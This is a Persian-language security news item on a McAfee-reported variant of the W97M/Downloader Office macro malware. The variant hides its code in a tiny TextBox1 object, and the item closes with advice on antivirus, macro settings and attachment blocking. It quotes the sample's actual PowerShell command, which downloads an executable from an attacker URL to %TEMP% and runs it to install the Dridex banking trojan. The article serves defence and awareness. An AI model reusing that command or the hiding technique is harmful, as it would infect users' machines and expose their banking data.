در حالی که بدافزارهای ماکرویی روزهای اوجشان را سپری می کنند نویسندگان این نوع بدافزارها همچنان در حال خلق راه های جدید برای بالا بردن احتمال اجرا شدن فایل های حاوی ماکروهای مخرب توسط کاربران هستند.
به گزارش شرکت مهندسی شبکه گستر، محققان شرکت McAfee بتازگی گونه جدیدی از بدافزار W97M/Downloader را شناسایی کرده اند که از تکنیکی جدید برای مخفی نمودن اهداف مخرب خود استفاده می کند.
انتشار این بدافزار از حدود یک سال پیش، از طریق فایل های Microsoft Office XML حاوی اشیاء (Object) فشرده شده MSO ActiveMime آغاز شد. این اشیاء یک شئی رمز شده OLE را باز می کردند که به همراه کدهای چند ماکرو بر روی دستگاه قربانی اجرا می شد. حالا محققان شرکت McAfee از اضافه شدن دو لایه حفاظتی جدید زیر در بدافزار W97M/Downloader خبر داده اند:
- سند XML مخرب در یک شئی چندبخشی MIME مخفی شده و در قالب فایل های DOC یا RTF از طریق هرزنامه ها منتشر می شود. به محض باز کردن پیوست این هرزنامه ها کد مخرب جاسازی شده در OLE اجرا می شود.
- کدی که عهده دار وظیفه دانلود و اجرای کد بدافزار اصلی است دیگر در ماکرو نیست. در عوض در شئی ای با عنوان TextBox1 جاسازی شده است.
همانطور که در تصویر بالا نشان داده شده کد مخرب در مشخصه (Attribute)های Value و Text شئی TextBox1 جاسازی شده است و بنابراین در ماکرو قابل روئیت نیست.
اندازه TextBox1 بسیار کوچک بوده و در تصویر بالا برای نشان دادن عملکرد بزرگ شده است.
ماکروهای دیگری نیز در سند موجود هستند که عملکرد آنها تنها فراخوانی کدهای درون TextBox1 است.
با فراخوانی TextBox1 بدافزار با استفاده از پروسه مجاز PowerShell فرمان زیر را به منظور دانلود و نصب بدافزار اصلی که یک بدافزار بانکی با عنوان Dridex است اجرا می کند:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://raspberry.diversified-capital-management.com/zalupa/kurva.php’,’%TEMP%\sdjgbcjkds.exe’);Start-Process ‘%TEMP%\sdjgbcjkds.exe’;
در این مرحله بدافزار Dridex بطور کامل کنترل دستگاه کاربر را در دست می گیرد.
برای مقابله با این بدافزارها رعایت موارد زیر توصیه می شود:
- از ضدویروس قدرتمند و به روز استفاده کنید. گونه جدید W97M/Downloader توسط ضدویروس McAfee با به روز رسانی DAT 8097 و بالاتر شناسایی می شود.
- بخش Macro را در نرم افزار Office برای کاربرانی که به این قابلیت نیاز کاری ندارند با فعال کردن گزینه “Disable all macros without notification” غیر فعال کنید. برای غیرفعال کردن این قابلیت، از طریق Group Policy، از این راهنما استفاده کنید.
- در صورت فعال بودن گزینه “Disable all macros with notification” در نرم افزار Office، در زمان باز کردن فایل های Macro پیامی ظاهر شده و از کاربر می خواهد برای استفاده از کدهای بکار رفته در فایل، تنظیمات امنیتی خود را تغییر دهند. آموزش و راهنمایی کاربران سازمان به صرف نظر کردن از فایل های مشکوک و باز نکردن آنها می تواند نقشی مؤثر در پیشگیری از اجرا شدن این فایل ها داشته باشد.
- ایمیل های دارای پیوست Macro را در درگاه شبکه مسدود کنید. بدین منظور می توانید از تجهیزات دیواره آتش، همچون Sophos UTM بهره بگیرید.
- سطح دسترسی کاربران را محدود کنید. بدین ترتیب حتی در صورت اجرا شدن فایل مخرب توسط کاربر، دستگاه به بدافزار آلوده نمی شود.